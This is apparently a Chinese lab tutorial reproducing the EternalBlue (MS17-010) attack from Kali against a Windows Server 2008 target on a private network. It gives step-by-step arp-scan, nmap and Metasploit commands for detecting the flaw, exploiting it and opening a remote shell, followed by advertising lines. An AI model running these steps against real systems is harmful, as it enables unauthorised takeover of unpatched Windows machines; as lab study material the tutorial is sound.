永恒之蓝漏洞复现(ms17-010)
永恒之蓝漏洞复现(ms17-010)
环境
信息收集
先扫描目标靶机IP
进入MSF查看是否存在永恒之蓝的漏洞
攻击
永恒之蓝漏洞复现(ms17-010)
环境
攻击机:kali
靶机:Windows Server 2008
信息收集
对ip进行收集开放什么端口
先扫描目标靶机IP
因为在同一个内网之中
所以可以使用arp-scan -l 进行查询
知道目标靶机IP(192.168.162.146)来进行更进一步的信息收集
nmap -sV -P- 192.168.162.146
使用nmap进行192.168.162.146IP下的全端口扫描
这里可以看出系统信息为Windows Server 2008
进入MSF查看是否存在永恒之蓝的漏洞
msfconsole
#搜寻模块
search ms17-010
#使用模块
use 3
show options
查看选项
set RHOSTS 192.168.162.146
设置目标IP
存在永恒之蓝的漏洞
返回
攻击
使用攻击模块
search ms17-010
use 0
set RHOSTS 192.168.162.146
攻击成功
输入shell
进入cmd模式
exit 退出shell
background 把shell放入后台
重新连接
sessions -i 1
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步